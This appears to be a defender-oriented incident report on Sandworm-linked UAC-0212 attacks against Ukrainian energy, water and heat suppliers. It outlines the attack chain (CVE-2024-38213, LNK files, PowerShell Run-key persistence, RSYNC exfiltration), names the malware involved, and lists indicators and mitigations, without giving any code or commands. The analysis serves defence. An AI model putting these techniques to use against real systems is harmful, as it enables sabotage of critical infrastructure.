Full Report
In Q1 2024, defenders uncovered destructive cyberattacks against the information and communication technology systems (ICT) of approximately 20 organizations in the critical infrastructure sector across 10 regions of Ukraine. CERT-UA has been observing this activity tracked as a separate threat cluster, UAC-0133, which, with a high level of confidence, is linked to a nefarious russia-afiliated […] The post UAC-0212 Attack Detection: Hackers Linked to UAC-0002 aka Sandworm APT Subcluster Launch Targeted Attacks Against the Ukrainian Critical Infrastructure appeared first on SOC Prime.
Analysis Summary
# Incident Report: UAC-0212/Sandworm APT Attacks Against Ukrainian Critical Infrastructure
## Executive Summary
Between Q1 2024 and February 2025, a threat cluster identified as UAC-0212, strongly linked to the Russia-affiliated Sandworm APT (UAC-0002), conducted widespread destructive cyberattacks targeting nearly 20 critical infrastructure organizations in Ukraine. The attackers used spear-phishing involving malicious PDF documents linked to CVE-2024-38213 exploitation to gain initial access, ultimately aiming to disrupt essential services like energy, water, and heat supply. Response involved detection via security platforms and analysis by CERT-UA, leading to community alerts regarding the group's escalating TTPs.
## Incident Details
- Discovery Date: Q1 2024 (Initial observation of planned activity); Alerts escalated in February 2025.
- Incident Date: Activity ongoing from mid-spring 2024 through February 2025.
- Affected Organization: Approximately 20 organizations in Ukraine across energy, water, and heat supply sectors (Critical Infrastructure/ICT providers); later expanded to supplier companies in Serbia and Czechia, and logistics firms in Ukraine.
- Sector: Critical Infrastructure (Energy, Water, Heat Supply), ICT Service Providers, Logistics, Manufacturing (Grain equipment).
- Geography: Ukraine (primary target), later Serbia and Czechia.
## Timeline of Events
### Initial Access
- Date/Time: Second half of 2024 onwards.
- Vector: Spear-phishing via malicious PDF documents disguised as "technical documentation" sent to impersonated potential clients.
- Details: Clicking a link in the email led to the exploitation of **CVE-2024-38213**, triggering the download of an LNK file (`pdf.lnk`).
### Lateral Movement
- Details: Execution of the LNK file launched a PowerShell command that persisted access (via the Run registry key), downloaded further executables (EXE/DLL files), and was followed by reconnaissance and deployment of custom tools like SECONDBEST / EMPIREPAST, SPARK malware, and CROOKBAG.
### Data Exfiltration/Impact
- Details: Attackers utilized **RSYNC** for prolonged document exfiltration. The ultimate objective appeared to be cyber-sabotage, aiming to disrupt the ICT systems of critical infrastructure and essential service enterprises.
### Detection & Response
- **Detection**: Activity tracked by CERT-UA as **UAC-0133** (linked to UAC-0212). Detections relied on identifying suspicious PowerShell execution, LNK file usage, persistence mechanisms, and communication via RSYNC.
- **Response**: CERT-UA issued alerts (e.g., CERT-UA#13702) warning defenders and enabling the deployment of specific detection algorithms on platforms like SOC Prime.
## Attack Methodology (Based on observed TTPs)
- Initial Access: User Execution: Malicious Link (T1204.001) via exploited CVE-2024-38213.
- Persistence: Boot or Logon Initialization Scripts (T1037) via Registry Run Keys (T1547.001).
- Privilege Escalation: *Not explicitly detailed, but implied by tool execution.*
- Defense Evasion: Obfuscation (T1027.010) via base64 encoding in PowerShell, execution via hidden window (T1564.003), and use of LOLBAS like **ForFiles** and **MSHTA**.
- Credential Access: *Not explicitly detailed.*
- Discovery: *Implied by subsequent execution of established C2 frameworks.*
- Lateral Movement: *Implied by the use of custom malware and attacker presence across multiple victim systems.*
- Collection: Custom malware (SECONDBEST, SPARK, CROOKBAG) designed to prepare targets.
- Exfiltration: Exfiltration Over Web Service (T1567) using **RSYNC**.
- Impact: Destructive cyber-attacks planned against essential service continuity.
## Impact Assessment
- Financial: *Not disclosed.*
- Data Breach: Exfiltration of documents/data occurred using RSYNC, likely preparatory intelligence or system configuration data for destructive payload delivery.
- Operational: High risk of severe operational disruption to Ukrainian energy, water, and heat supply sectors.
- Reputational: Targeting critical national infrastructure suggests significant national security impact.
## Indicators of Compromise
- Network Indicators: Traffic related to **RSYNC** used for C2/Exfiltration.
- File Indicators: LNK files with double extensions (e.g., `pdf.lnk`), EXE/DLL files associated with SPARK, SECONDBEST, or CROOKBAG.
- Behavioral Indicators: Suspicious PowerShell execution involving base64 decoding, loading .NET methods, and downloading files (`cmdline` observables), registry modifications for persistence (Run keys).
## Response Actions
- **Containment:** (Implied) Blocking identified IOCs and hunting for persistence mechanisms (Registry Run Keys).
- **Eradication:** (Implied) Removal of LNK files, executables (SECONDBEST/SPARK/CROOKBAG), and reversing registry modifications.
- **Recovery:** (Implied) Restoring system integrity, particularly focusing on ICT service provider networks to prevent cascading failure into critical infrastructure.
## Lessons Learned
- State-sponsored threat actors, specifically Sandworm, continue refining TTPs using initial access brokers/supply chain vectors (targeting ICT providers before infrastructure).
- Exploitation of common document handlers combined with known vulnerabilities (CVE-2024-38213) remains a viable access vector.
- Custom tools (CROOKBAG, SPARK) and living-off-the-land binaries (LOLBAS) are heavily utilized for persistence and evasion.
## Recommendations
- Implement strict email gateway defenses, particularly concerning links embedded within PDF documents, and enforce the Principle of Least Privilege to limit the impact of CVE exploitation.
- Proactive threat hunting should focus specifically on LNK file execution, PowerShell commands attempting persistence via Run keys, and unusual RSYNC activity across the network perimeter.
- Ensure robust network segmentation between managed service providers and critical infrastructure components to prevent lateral escalation.